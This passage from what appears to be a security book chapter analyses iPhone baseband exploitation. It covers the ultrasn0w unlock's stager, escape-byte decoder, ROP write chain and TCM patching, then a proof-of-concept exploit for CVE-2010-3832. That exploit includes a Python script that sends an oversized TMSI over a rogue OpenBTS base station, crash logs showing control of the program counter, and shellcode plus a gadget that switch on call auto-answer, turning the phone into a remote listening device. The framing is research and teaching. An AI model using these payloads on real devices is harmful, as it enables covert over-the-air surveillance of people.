0xFFFF1FF8 FC   D9 1F 60 P_memcpy        DCD 0x601FD9FC; DATA XREF: 0xFFFF1FDA
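The structure of the write chain and the length fix-up performed by the stager can be checked with a short model. The gadget addresses and data words are taken from the listings above; the helper names are hypothetical, and the model only builds the list of 32-bit words that follow the r4 to r7 slots. It does not apply any encoding needed to get those words through the AT parser.

```python
import struct

GADGET_STORE = 0x6014A0F1   # STR R4, [R5] followed by POP {R3-R5, PC}
GADGET_POP = 0x6014A0F3     # same gadget entered two bytes later, skipping the STR


def build_write_chain(writes, entry, filler=0x55555555):
    """Return the stack words that write each (address, value) pair, then jump."""
    words = [GADGET_POP]                       # first return: just load R3-R5
    for address, value in writes:
        words += [filler, value, address, GADGET_STORE]
    words += [filler, filler, filler, entry]   # final POP, then enter the code
    return words


def fixed_up_length(first, second):
    """Length as computed by the stager's ADDS R2, R2, R3 (32-bit wraparound)."""
    return (first + second) & 0xFFFFFFFF
```

With the two summands from the listing, fixed_up_length(0x1010159, 0xFEFEFEFF) evaluates to 0x58, which matches the distance from 0xFFFF04D0 to the end of the decoder's literal pool. Splitting the length this way keeps zero bytes out of the string.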

This code is a stager routine that copies the code from the remaining unlock string to another area at the top end of the memory. The code in question lives at 0xFFFF04D0 and disassembles as follows:

0xFFFF04D0 detour_0xFFFF04D0                           ; detour to ROM
0xFFFF04D0                   LDR             PC, =0x40736334
0xFFFF04D0 ; --------------------------------------------------
0xFFFF04D4                   CODE16
0xFFFF04D4 org_0xFFFF04D0    DCD 0x40736334  ; DATA XREF: detour_0xFFFF04D0
0xFFFF04D8 ; -----------------------------------------------
0xFFFF04D8
0xFFFF04D8 decoder_entry
0xFFFF04D8                   LDR             R0, =0x60FA011F
0xFFFF04DA                   SUBS            R0, #0x80       ; avoid 0 bytes
0xFFFF04DC                   SUBS            R0, #0x80       ; R0 = 0x60FA001F
0xFFFF04DE                   LDR             R2, =0x60701280
0xFFFF04E0                   STR             R0, [R2]
0xFFFF04E2                   ADDS            R4, R4, R7
0xFFFF04E4                   LDR             R0, =0x6018135C
0xFFFF04E6                   BLX             R0            ; call disable_ints
0xFFFF04E8                   MOVS            R7, R0
0xFFFF04EA                   ADDS            R2, R5, R6
0xFFFF04EC                   MOVS            R5, #0x22 ; ‘"’
0xFFFF04F0
0xFFFF04F0 decoder_loop                      ; CODE XREF: 0xFFFF0508
0xFFFF04F0                   LDRB            R0, [R4]
0xFFFF04F2                   CMP             R0, R5    ; check for end of str
0xFFFF04F4                   BEQ             break_loop
0xFFFF04F6                   NOP
0xFFFF04F8                   CMP             R0, #0xFF ; escape character
0xFFFF04FA                   BNE             non_escaped
0xFFFF04FC                   ADDS            R4, #1    ; skip 0xFF
0xFFFF04FE                   LDRB            R0, [R4]
0xFFFF0500                   ADDS            R0, #1
0xFFFF0502
0xFFFF0502 non_escaped                       ; CODE XREF: 0xFFFF04FA
0xFFFF0502                   STRB            R0, [R2]
0xFFFF0504                   ADDS            R4, #1
0xFFFF0506                   ADDS            R2, #1
0xFFFF0508                   B               decoder_loop
0xFFFF050A ; ------------------------------------------------------
0xFFFF050A
0xFFFF050A break_loop                                  ; CODE XREF: 0xFFFF04F4
0xFFFF050A                   MOVS            R0, R7
0xFFFF050C                   LDR             R1, =0x6018136C
0xFFFF050E                   BLX             R1        ; call restore_cpsr
0xFFFF0510                   SUBS            R0, R1, R1
0xFFFF0512                   MOV             R2, SP
0xFFFF0514                   LDR             R2, [R2]
0xFFFF0516                   BX              R2
0xFFFF0516 ; -------------------------------------------------------------------
0xFFFF0518 dword_FFFF0518  DCD 0x60FA011F            ; DATA XREF: decoder_entry
0xFFFF051C dword_FFFF051C  DCD 0x60701280            ; DATA XREF: 0xFFFF04DE
0xFFFF0520 P_disable_ints  DCD 0x6018135C            ; DATA XREF: 0xFFFF04E4
0xFFFF0524 P_restore_cpsr  DCD 0x6018136C            ; DATA XREF: 0xFFFF050C

Since a routine of the ThreadX OS lived at the address overwritten by the previous code, the first instruction is a simple detour to a version of the overwritten function in flash. The code starting at 0xFFFF04D8 is a simple decoding function that is used by subsequent at+xapp overflow instantiations to allow for arbitrary payloads; this decoder is required if you want to inject binary blobs, as certain bytes such as whitespace and the zero byte are not allowed to appear in the string passed to at+xapp. The decoder uses r5+r6 as the destination address for the decoded payload and r4+r7 as the source address for its input. It works by copying bytes until it hits a double-quote character (0x22), regarding 0xff as an escape symbol. If 0xff is found in the input, the escape symbol is discarded and the byte following it is incremented by one (modulo 256) and copied to the output.
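The escape scheme is easy to model. The decode() function below mirrors the decoder loop shown in the disassembly; encode() is the matching encoder we would expect a payload generator to use. The encoder is our own reconstruction rather than code taken from ultrasn0w, and the exact set of bytes the AT parser rejects is an assumption.

```python
ESCAPE = 0xFF
TERMINATOR = 0x22                      # the closing double quote
FORBIDDEN = {0x00, 0x20, TERMINATOR}   # assumed set of bytes the AT parser rejects


def encode(payload):
    """Escape bytes that may not appear raw, then append the terminator."""
    out = bytearray()
    for byte in payload:
        if byte in FORBIDDEN or byte == ESCAPE:
            escaped = (byte - 1) & 0xFF        # the decoder adds one again
            if escaped in FORBIDDEN:
                raise ValueError("cannot escape 0x%02X" % byte)
            out += bytes([ESCAPE, escaped])
        else:
            out.append(byte)
    out.append(TERMINATOR)
    return bytes(out)


def decode(encoded):
    """Mirror of the decoder loop: copy until 0x22, treating 0xFF as escape."""
    out = bytearray()
    pos = 0
    while encoded[pos] != TERMINATOR:
        byte = encoded[pos]
        if byte == ESCAPE:
            pos += 1                            # skip the escape symbol
            byte = (encoded[pos] + 1) & 0xFF    # STRB keeps only the low byte
        out.append(byte)
        pos += 1
    return bytes(out)
```

A zero byte, for example, is transmitted as the pair 0xFF 0xFF: the decoder skips the first 0xFF, adds one to the second, and stores the low byte of the result.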

This approach raises two questions: Why is a ROP chain needed to inject the decoder and what is so special about the memory space the stager and the decoder were copied to?

The X-Gold 61x introduced a new security feature, namely a strict form of Data Execution Prevention (DEP). All memory regions that are writable lack the execute flag. Furthermore, memory is marked as executable in the early initialization phase, and after this phase the page permissions are locked. There seems to be no way to ever set an execute flag on a writable page after this initialization phase is completed.

On the other hand, you can see native code rather than just ROP chains in the preceding payload. How does that work? It turns out that the DEP armor has a significant chink. ARM CPUs can have fast first-level memory, called tightly coupled memory (TCM). The ARM1176 core in the X-Gold 61x has a TCM that is enabled during initialization:

0x40100054     MOV    R0, #0  ; TCM bank 0
0x40100058     MCR    p15, 0, R0,c9,c2, 0 ; write TCM selection register
0x4010005C     NOP
0x40100060     MOV    R0, #1  ; "1 = I/D TCM Region Register accessible in
                              ; Secure and Non-secure worlds."
0x40100064     MCR    p15, 0, R0,c9,c1, 2 ; write DTCM non-secure control access
                                          ; register
0x40100068     NOP
0x4010006C     MCR    p15, 0, R0,c9,c1, 3 ; write ITCM non-secure control access
                                          ; register
0x40100070     NOP
0x40100074     LDR    R1, =0xFFFF000D ; enable ITCM with base address 0xFFFF0000
0x40100078     MCR    p15, 0, R1,c9,c1, 1 ; write ITCM region register
0x4010007C     NOP
0x40100080     LDR    R1, =0xFFFF200D ; enable DTCM with base address 0xFFFF2000
0x40100084     MCR    p15, 0, R1,c9,c1, 0 ; write DTCM region register
0x40100088     NOP
0x40100088 ==========================
0x4010008C     MOV    R0, #1  ; TCM bank 1
0x40100090     MCR    p15, 0, R0,c9,c2, 0 ; write TCM selection register
0x40100094     NOP
0x40100098     MOV    R0, #1  ; "1 = I/D TCM Region Register accessible in
                              ;  Secure and Non-secure worlds."
0x4010009C     MCR    p15, 0, R0,c9,c1, 2 ; write DTCM non-secure control access
                                          ; register
0x401000A0     NOP
0x401000A4     MCR    p15, 0, R0,c9,c1, 3 ; write ITCM non-secure control access
                                          ; register
0x401000A8     NOP
0x401000AC     LDR    R1, =0xFFFF100D
0x401000B0     MCR    p15, 0, R1,c9,c1, 1 ; write ITCM region register
0x401000B4     NOP
0x401000B8     LDR    R1, =0xFFFF300D
0x401000BC     MCR    p15, 0, R1,c9,c1, 0 ; write DTCM region register
0x401000C0     NOP
0x401000C4     BX     LR

This explains why the exploit could write to addresses above 0xFFFF0000 and have the CPU execute the written data as code.
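To see which address ranges the four writes to the TCM region registers cover, the constants loaded into R1 can be decoded. The following sketch assumes the register layout we recall from the ARM1176 documentation (base address in bits 31:12, a size field in bits 6:2 where the value 3 means 4KB and each increment doubles the size, enable flag in bit 0); verify this layout against the technical reference manual before relying on it. The function name is hypothetical.

```python
def decode_tcm_region(value: int) -> dict:
    """Split a TCM region register value into its fields (assumed layout)."""
    size_field = (value >> 2) & 0x1F
    return {
        "base": value & 0xFFFFF000,
        # Assumed encoding: 0 means no TCM, 3 means 4KB, 4 means 8KB, ...
        "size_kb": 0 if size_field == 0 else 1 << (size_field - 1),
        "enabled": bool(value & 1),
    }


# The four constants from the initialization routine above.
for name, value in [("ITCM bank 0", 0xFFFF000D), ("DTCM bank 0", 0xFFFF200D),
                    ("ITCM bank 1", 0xFFFF100D), ("DTCM bank 1", 0xFFFF300D)]:
    region = decode_tcm_region(value)
    print("%s: base 0x%08X, %d KB, enabled=%s"
          % (name, region["base"], region["size_kb"], region["enabled"]))
```

Under these assumptions, each bank is an enabled 4KB region, which fits the stager living in the range starting at 0xFFFF0000 and the patches being applied relative to 0xFFFF1000.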

To make sense of the second and third at+xapp strings being sent, you first have to understand the last one. We will not give the payload contained in the last unlock string in its entirety, but rather only have a quick look at the meat of it:

0xFFFF0A30            LDR          R4, =0x601FD9FC ; memcpy
0xFFFF0A32            LDR          R5, =0x60FA0000 ; void *ptr = 0x60FA0000
0xFFFF0A34            LDR          R6, =0xFFFF1000
0xFFFF0A36
0xFFFF0A36 tcm_patch_loop                  ; CODE XREF: sub_FFFF09A8+A2
0xFFFF0A36            LDRH         R0, [R5] ; dst_offset = *((uint16_t *) ptr)
0xFFFF0A38            LDRH         R2, [R5,#2] ; len = *((uint16_t *) ptr + 1)
0xFFFF0A3A            MOVS         R7, R2
0xFFFF0A3C            CMP          R2, #0  ; if (len == 0)
0xFFFF0A3E            BEQ          tcm_pl_exit ; { goto tcm_pl_exit; }
0xFFFF0A40            ADDS         R5, #4  ; ptr += 4
0xFFFF0A42            MOVS         R1, R5
0xFFFF0A44            ADDS         R0, R0, R6 ; dst = 0xFFFF1000 + dst_offset
0xFFFF0A46            BLX          R4      ; memcpy(0xFFFF1000 + dst_offset,
                                          ; ptr, len)
0xFFFF0A48            ADDS         R5, R5, R7 ; ptr += len
0xFFFF0A4A            B            tcm_patch_loop
0xFFFF0A4C ; --------------------------------------------------------
0xFFFF0A4C
0xFFFF0A4C tcm_pl_exit                     ; CODE XREF: sub_FFFF09A8+96
0xFFFF0A4C            LDR          R0, =0xFFFF0F78
0xFFFF0A4E            ADR          R1, sub_FFFF0B54
0xFFFF0A50            MOVS         R2, #0xC
0xFFFF0A52            BLX          R4
0xFFFF0A54            BL           sub_FFFF0A74
0xFFFF0A58            POP          {R4-R7}
0xFFFF0A5A            MOVS         R0, #0
0xFFFF0A5C            LDR          R3, =0x60186E5D ; stack_cleanup (SP+=0x1C)
0xFFFF0A5E            BX           R3

The second and third at+xapp strings store, at address 0x60FA0000, a list of TCM memory regions to patch. The previous code traverses this list, which has a simple format: each entry has a header consisting of a 16-bit offset field relative to 0xFFFF1000 and a 16-bit length field giving the entry's length without the header. The list is terminated by an entry whose length field is zero. The following IDAPython script emulates the behavior of the previous native code.

from idc import *

ea = 0x60FA0000
dst = 0xFFFF1000
while True:
    n = Word(ea+2)
    offset = Word(ea)
    if n == 0:
        break
    print "patching %d bytes at 0x%08x." % (n, dst + offset)
    ea += 4
    for i in range(n):
        PatchByte(dst+offset+i, Byte(ea+i))
        SetColor(dst+offset+i, CIC_ITEM, 0xFFFF00)
    ea += n

Use the Load Additional Binary File function to load the decoded, concatenated payload of unlock strings two and three to address 0x60FA0000 into an existing IDA Pro database of the stack, then run the preceding script.
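If you only want to inspect the patch list without an IDA Pro database, the same format can be parsed from the raw decoded bytes. This is a sketch under the assumption that both header fields are little-endian (as expected on this ARM target); `parse_patch_list` is a hypothetical helper name.

```python
import struct

TCM_PATCH_BASE = 0xFFFF1000  # offsets in the list are relative to this address


def parse_patch_list(blob: bytes, base: int = TCM_PATCH_BASE):
    """Return a list of (destination address, data) tuples."""
    patches = []
    pos = 0
    while True:
        # Header: 16-bit offset, 16-bit length (assumed little-endian).
        offset, length = struct.unpack_from("<HH", blob, pos)
        if length == 0:          # a zero length terminates the list
            break
        pos += 4                 # skip the header
        patches.append((base + offset, blob[pos:pos + length]))
        pos += length            # advance to the next entry
    return patches
```

Feeding it the decoded, concatenated payload of unlock strings two and three should list the same destinations the IDAPython script patches.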

Another interesting facet of the payload contained in the last unlock string is the following pair of functions, given here in their C representations:

/* 0xFFFF0AB2 */
void replace_addrs_on_stack(uint32_t *start, uint32_t *end, uint32_t match20msb,
                           uint32_t replace_base)
{
  while ( start < end )
  {
    /* this remaps every address pointing to the TCM region on the stack to
       its flash equivalent. forreal. whoaaa */
    if ( *start >> 12 == match20msb >> 12 )
      *start = (*start & 0xFFF) + replace_base;
    ++start;
  }
}

/* 0xFFFF07AE */
void replace_addrs_on_all_stacks(void *match20msb, void *replace_base) {
    thread_ptr = tx_thread_created_ptr; /* [R4] */

    /* i is stored in [SP]
     * tx_thread_created_count is in R7
     * thread_ptr is in R4
     */
    for(i = 0; i < tx_thread_created_count; i++) {
          replace_addrs_on_stack(thread_ptr->tx_thread_stack_start,
                               thread_ptr->tx_thread_stack_end,
                               match20msb, replace_base);
          thread_ptr = thread_ptr->next;
    }
}

The replace_addrs_on_all_stacks function corrects the return addresses on the stacks of all threads. Every return address pointing into the TCM is rewritten to an address in flash memory; these are the memory locations from which the code copied by the scatter-loader into the TCM originates.
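The effect of the rewrite on a single stack can be illustrated with a small model. The stack contents and the flash base address used in the usage note are invented for illustration; only the matching rule (compare the upper 20 bits, keep the lower 12) is taken from the C representation above.

```python
def replace_addrs(words, match20msb, replace_base):
    """Remap every word whose upper 20 bits match to replace_base + low 12 bits."""
    return [
        (w & 0xFFF) + replace_base if (w >> 12) == (match20msb >> 12) else w
        for w in words
    ]
```

For example, with a hypothetical flash base of 0x60180000, `replace_addrs([0xFFFF1360, 0xA0072443], 0xFFFF1000, 0x60180000)` rewrites the first word to 0x60180360 and leaves the second one alone.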

The lessons you learned from ultrasn0w will be of great advantage if you choose to develop a remote exploit for the iPhone 4.

An Overflow Exploitable Over the Air

This section analyzes the CVE-2010-3832 vulnerability and gives a proof-of-concept exploit for it. The vulnerability is a memory corruption caused by a missing bounds check on the length of the TMSI in LOCATION UPDATING REQUESTs and TMSI REALLOCATION COMMANDs, both of which belong to Mobility Management. It affects the cellular stack of all iOS devices running versions prior to iOS 4.2. No interaction with the device is required from the user; the device simply has to come into range of a malicious base station set up to exploit this vulnerability.

Here we show you how to trigger this vulnerability and how to leverage the heap corruption to gain control over the program counter. We then show you how to turn on the auto-answer functionality of the iPhone by executing the handler for setting the S0 register. This allows an attacker to turn an iPhone into a remote listening device.

We investigate this bug on an iPhone 2G running iOS 3.1.3 with baseband firmware ICE 04.05.04_G. The description here is the story that was recovered from scattered notes on how the bug was originally found and exploited, modulo some boring dead ends that were removed. We have chosen the iPhone 2G over the more recent iPhone 4 for two reasons: First, because the codebase of the iPhone 2G is much smaller and hence a clean IDB can be obtained much more quickly than for the iPhone 4. Second, for the iPhone 4, this bug has been patched and no known ways exist to downgrade the baseband firmware to a vulnerable version. Contrast this to the case of the iPhone 2G where firmware is completely malleable due to implementation failures in the security checks performed by the bootloader. This means that you can buy any old second-hand iPhone 2G and get your hands dirty in baseband hacking with a publicly known vulnerability; no fear that you've bought a version with the wrong baseband firmware revision, and no lost time and money due to accidental upgrades.

A TMSI REALLOCATION COMMAND with the length of the TMSI extended to 64 bytes neatly triggers the bug. Figure 11.3 shows a GSM layer 3 message containing a TMSI REALLOCATION COMMAND that triggers the bug, displayed via the Wireshark network analyzer.

Note
TMSIs smaller than 64 bytes do not cause a crash, at least on the iPhone 2G.

Figure 11.3 Malicious TMSI REALLOCATION COMMAND dissected with Wireshark


Unfortunately, the message cannot be created directly with an unmodified version of libmich: in standards-compliant implementations of the GSM and 3GPP protocols there is no reason to support TMSIs whose length differs from four bytes. However, you can easily use libmich to create an appropriate message and then modify the TMSI field and length.
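The byte layout of such an oversized message can be sketched without libmich. The helper below, `build_tmsi_realloc` (a hypothetical name), reproduces the layout used by the sending script later in this section; the field interpretations in the comments are our reading of those bytes and should be checked against the Wireshark dissection.

```python
def build_tmsi_realloc(lac: int, nwords: int) -> bytes:
    """Build a TMSI REALLOCATION COMMAND carrying nwords 32-bit words as TMSI."""
    # 05 1a: Mobility Management, TMSI REALLOCATION COMMAND;
    # 00 f1 10: MCC/MNC part of the location area identification.
    msg = bytes.fromhex("051a00f110")
    # Two-byte location area code.
    msg += bytes([lac >> 8, lac & 0xFF])
    # Mobile identity length (one type byte plus the TMSI), then the type byte
    # 0xfc exactly as it appears in the script.
    msg += bytes([4 * nwords + 1, 0xFC])
    # Each word is 0x666666NN in little-endian order, with NN = 4 * index, so
    # a crash log reveals which word ended up in which register.
    msg += b"".join(bytes([4 * i, 0x66, 0x66, 0x66]) for i in range(nwords))
    return msg


print(build_tmsi_realloc(42, 19).hex())
```

Marking every word with its own offset is a cheap substitute for a cyclic pattern: any 0x666666NN value in a register dump maps straight back to a position in the TMSI.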

First start up OpenBTS, register the iPhone with your network, and initiate a UDP channel for exchanging GSM layer 3 packets with the handset by using the testcall facility of OpenBTS:

OpenBTS> tmsis
TMSI       IMSI            IMEI(SV)           age  used
0x4f5e0ccc 262XXXXXXXXXXXX 01XXXXXXXXXXXXXX  293s  293s

1 TMSIs in table
OpenBTS> testcall 262XXXXXXXXXXXX 60

OpenBTS> calls
1804289383 TI=(1,0) IMSI=262XXXXXXXXXXXX Test from=0 Q.931State=active SIPState=Null (2 sec)

1 transactions in table

You then send this payload using the following small Python script:

#!/usr/bin/python

import socket
import time
import binascii
from libmich.formats import *

TESTCALL_PORT = 28670

nwords = 19  # number of 32-bit words in the oversized TMSI
lai = 42
hexstr = "051a00f110"
hexstr += "%02x%02x%02xfc" % (lai>>8, lai&255, (4*nwords+1))
hexstr += ''.join('%02x666666' % (4*i) for i in range(nwords))

print "layer3 message to be sent:", hexstr
l3msg = binascii.unhexlify(hexstr)
print "libmich interprets this as: ", repr(L3Mobile.parse_L3(l3msg))

tcsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
tcsock.settimeout(1)
try:
    tcsock.sendto(l3msg, ('127.0.0.1', TESTCALL_PORT))
    reply = tcsock.recv(1024)
    print "reply received: ", repr(L3Mobile.parse_L3(reply))
except socket.timeout:
    print "no reply received. potential crash?"

Shortly after executing that script, you lose your signal (the baseband processor resets). The result is a crash log similar to the following on the iPhone, which you can extract using AT+XLOG:

+XLOG: Exception Number: 1
Trap Class: 0xAAAA (HW DATAABORT TRAP)
System Stack:
            0x6666661C
            0x66666630
            0x66666644
            0xA027CBFC
            0xA027CCE4
            0x6666665C
            0x0000000A
            0x6666665C
            [...]

Date: 14.07.2010
Time: 04:58
Register:
r0:   0xA027CBFC   r1:   0xA027CCE4 r2:   0x6666665C
r3:   0x0000000A   r4:   0x6666665C r5:   0xA027CCE4
r6:   0x00000001   r7:   0xB0016AA4 r8:   0x00000000
r9:   0xA00028E4   r10:  0xB008E730 r11:  0xB008FE9C
r12:  0x45564E54   r13:  0xB008FA8C r14:  0xA0072443
r15:  0xA0026818
SPSR: 0xA0000033  DFAR:  0x6666666C DFSR: 0x00000005

Take a peek at the code producing the preceding exception:

ROM:A002680A FF B5               PUSH    {R0-R7,LR}
ROM:A002680C 0D 00               MOVS    R5, R1
ROM:A002680E 83 B0               SUB     SP, SP, #0xC
ROM:A0026810 10 69               LDR     R0, [R2,#0x10]
        ; causes HW DATAABORT TRAP
ROM:A0026812 14 00               MOVS    R4, R2
ROM:A0026814 0D 9A               LDR     R2, [SP,#0x30+arg_4]
ROM:A0026816 0C 99               LDR     R1, [SP,#0x30+arg_0]
ROM:A0026818 FF F7 6D FB         BL      sub_A0025EF6
ROM:A002681C A0 69               LDR     R0, [R4,#0x18]
ROM:A002681E 26 00               MOVS    R6, R4

This code is at the beginning of a function we call recv_signal() (our choice, not the official name). It is called from more than 40 tasks and is used for inter-task communication; it receives signals from other tasks. In this case, the link register (r14) shows that it was called directly from the main function of the mme:1 task. Moreover, by looking at the pool allocations in the Application_Initialize() routine, you can deduce that the partition allocated was from a pool handing out chunks of 52 bytes.

Despite the crash log showing the program counter (r15) to be 0xA0026818, you can deduce from the Data Fault Address Register (DFAR) and the dump of the other registers that the instruction that caused the fault was the register load from memory at 0xA0026810. Great! This means you control the first argument that is passed to the function sub_A0025EF6(ptr). Disassembling this function shows that it is a mere wrapper around NU_Deallocate_Partition(ptr) that first checks whether ptr == NULL. In case of a NULL pointer it logs an error; otherwise it simply calls NU_Deallocate_Partition(ptr). Looking closer at the implementation of partition memory, you can see that going this route will not be easy. In contrast to the dynamic memory implementation, partition memory does not give you an easy write4 primitive because its fixed-size blocks never need to be coalesced. Other ways exist to exploit control over some of the registers in this scenario, but they are all long-winded and painful.
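The deduction about the faulting instruction can be checked with the numbers from the crash log. The sketch below only restates values printed above; the remark about the offset of eight relies on the usual ARM convention that the address saved on a data abort lies eight bytes past the aborted instruction, which we assume is what the log reports as r15.

```python
R2 = 0x6666665C             # r2 from the register dump (attacker-controlled word)
DFAR = 0x6666666C           # data fault address from the crash log
FAULTING_INSN = 0xA0026810  # LDR R0, [R2,#0x10]
REPORTED_PC = 0xA0026818    # r15 from the crash log

load_addr = R2 + 0x10       # address accessed by the LDR
pc_delta = REPORTED_PC - FAULTING_INSN

print("LDR accesses 0x%08X, DFAR is 0x%08X" % (load_addr, DFAR))
print("reported pc is %d bytes past the LDR" % pc_delta)
```

Both observations point at the LDR at 0xA0026810 rather than at the BL instruction found at the reported program counter.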

A simpler way to achieve your goal is to demand control over the program counter! It turns out there is an easy way to achieve that. By increasing the length of the TMSI by four, and hence the number of overwritten words by one, in each try, you quickly arrive at the case of 19 overwritten words:

+XLOG: Exception Number: 1
Trap Class: 0xBBBB (HW PREFETCH ABORT TRAP)
System Stack:
            0xA006FCA4
            0x00000677
            0x00000000
            0x0000000A
            0x00000000
            0x00000000
            0xB000E720
            0xB000E788
Date: 17.07.2010
Time: 21:31
Register:
r0:   0x00000000   r1:   0x60000013 r2:   0xFFFF231C
r3:   0x00000000   r4:   0x6666665C r5:   0x66666660
r6:   0x66666664   r7:   0xB0016978 r8:   0x00000000
r9:   0xA00028E4   r10:  0xB008E730 r11:  0xB008FE9C
r12:  0x45564E54   r13:  0xB008FABC r14:  0xFFFF1360
r15:  0x6666666C
SPSR: 0x60000013  DFAR:  0x00000024 DFSR: 0x00000005

Lo and behold, you have gained control over the program counter! Looking around the area referenced by the link register, you see that the function you were supposed to be returning from had no arguments and was called using a BL instruction. To test whether things are working, you try to return to a location that simply does a BX LR. Woohoo, this works as well! No crash log is produced and no signal is lost when you send a message with 0xFFFF058C as the 19th word of the TMSI.

Finally, take a look at how to turn on auto-answer. The 3GPP specification 27.007, together with ITU-T Recommendation V.250, makes automatic answering of calls after a specified number of rings mandatory to implement. The number of rings is held in an S register, namely S0, and can be set using the AT command ATS0=n, with n being the number of rings; its value can be queried using ATS0?. The contents of the S registers can be stored in NVRAM as a so-called ATC profile using AT&W. After you have identified a function manipulating this ATC profile using error strings, you can hunt down the functions reading from and writing to NVRAM and figure out the in-memory format of the ATC profile. You then see that the following function get_at_sreg_value is called to query register Sn with k set to zero.

/* 0xA01B9F1B */
uint32_t _fastcall get_at_sreg_base_ptr(uint32_t a1, uint32_t a2)
{
  uint32_t *t1;
  uint32_t *t2;
  uint32_t result;

  t1 = &dword_B01B204C[15 * a1];
  t2 = &dword_B01B23D0[17 * a2];
  if ( t1[12] )
    result = t2[14] + t1[13];
  else
    result = 0;
  return result;
}

/* 0xA01C5AB7 */
uint32_t _fastcall get_at_sreg_value(uint32_t k, uint32_t n)
{
  /* S registers are single bytes stored 8 bytes past the base pointer */
  return *(uint8_t *)(get_at_sreg_base_ptr(9, k) + n + 8);
}

The plan takes shape: Using the knowledge gained from the previous functions allows you to set the S0 register remotely using a very short program. As a first step, you can write a little assembly program to set the S0 ring counter using the at+xapp overflow. An example looks like this:

00000000 <write_ats0_reg>:
   0:  2107      movs r1, #7           /* can't load #9 directly (whitespace) */
   2:  1c88      adds r0, r1, #2       /* r0 = 9 */
   4:  1a49      subs r1, r1, r1       /* r1 = 0 */
   6:  47a8      blx  r5               /* call 0xA01B9F1B */
   8:  2401      movs r4, #1      
   a:  7204      strb r4, [r0, #8]     /* set S0 = 1 */
   c:  1b20      subs r0, r4, r4       /* r0 = 0, indicates ERROR */
   e:  b00a      add sp, #0x28        /* adjust stack pointer */
  10:  bd70      pop {r4, r5, r6, pc} /* clean continuation */
  12:  46c0      nop                  /* nop needed to align to word boundary */

A primitive way to test the above code then is the following:

# printf 'AT+XAPP="####################################' > xapp-bin
# printf '4444\x1b\x9f\x1b\xA066667777\xF5\x2C\x0B\xB0' >> xapp-bin
# printf '\x07\x21\x88\x1c\x49\x1a\xa8\x47\x01\x24\x04' >> xapp-bin
# printf '\x72\x20\x1b\x0a\xb0\x70\xbd\xc0\x46"' >> xapp-bin
# ./sendmodem "`cat xapp-bin`"
Sending command to modem: AT
---.+
AT
OK
Sending command to modem: AT+XAPP="####################################444466667
777?,
                                                                        
?!?I?G$r
p??F"
-..+
AT+XAPP="####################################444466667777?,
                                                           ?!?I?G$r
p??F"
ERROR
# ./sendmodem 'ATS0?'
Sending command to modem: AT
-.+
AT
OK
Sending command to modem: ATS0?
-...+
ATS0?
001

OK
#

As you see, the at+xapp payload manages to set the S0 register to one. If you call the iPhone now, it will automatically answer the call after the first ring. Let us now come to the last step and build the payload for switching on this feature remotely.
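The hex bytes passed to printf in the test above are simply the 16-bit Thumb opcodes from the write_ats0_reg listing, stored in little-endian order, preceded by the values that end up in r4 to r7 and the program counter. A short sketch to reproduce the shellcode portion and the value placed in r5:

```python
import struct

# Opcodes copied from the write_ats0_reg listing, in program order.
OPCODES = [0x2107, 0x1C88, 0x1A49, 0x47A8, 0x2401,
           0x7204, 0x1B20, 0xB00A, 0xBD70, 0x46C0]

# Thumb instructions are 16 bits wide and stored little-endian.
shellcode = b"".join(struct.pack("<H", op) for op in OPCODES)

# r5 holds the address of get_at_sreg_base_ptr (odd, hence Thumb mode).
r5_bytes = struct.pack("<I", 0xA01B9F1B)

print(shellcode.hex())
print(r5_bytes.hex())
```

Generating the bytes this way avoids transcription errors when you change the assembly and need to rebuild the at+xapp string.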

Modifying the above payload slightly to crash instead of writing the value, you can find out that the S0 register lives at address 0xB002D768 in memory. As an example, you could now use the following gadget to turn on auto-answer remotely:

0xA01EC43C 1C 61 C4 E5                             STRB    R6, [R4,#0x11C]
0xA01EC440 F0 81 BD E8                             LDMFD   SP!, {R4-R8,PC}

Note that execution needs to continue cleanly after the value 1 has been written to the above-mentioned address. Altogether, this gives us a single message of less than 100 bytes that succinctly demonstrates the exploitability of CVE-2010-3832.
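The register values the gadget needs follow directly from the STRB offset. The sketch below assumes that r4 and r6 are attacker-controlled at the time the gadget runs, as the second crash log suggests; `gadget_registers` is a hypothetical helper.

```python
S0_ADDR = 0xB002D768   # address of the S0 register found above
STRB_OFFSET = 0x11C    # immediate in STRB R6, [R4,#0x11C]


def gadget_registers(target: int, value: int) -> dict:
    """Register values so that the STRB writes the byte value to target."""
    return {
        "r4": (target - STRB_OFFSET) & 0xFFFFFFFF,
        "r6": value & 0xFF,  # STRB stores only the low byte of r6
    }


regs = gadget_registers(S0_ADDR, 1)
print("r4 = 0x%08X, r6 low byte = 0x%02X" % (regs["r4"], regs["r6"]))
```

The words popped by the LDMFD that follows the store must then be arranged so that the final value loaded into the program counter resumes normal execution.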

Summary

We have given a thorough introduction to baseband attacks against iOS devices. After providing background knowledge on cellular networks, we showed you the inner workings of the real-time operating systems running on the baseband chips of the various generations of iOS devices and the intricacies of their heap memory managers.

These rather theoretical aspects were then counterbalanced with a quick-start guide for getting a quick-and-dirty OpenBTS setup up and running. This setup allows you to run your own GSM test network for researching over-the-air baseband attacks in the lab.

We then dissected the actual cellular stacks and discussed their attack surface. We showed you techniques to use to find bugs yourself. Finally, we provided examples of two public vulnerabilities (one local, one remote) and explained the workings of the ultrasn0w unlock.
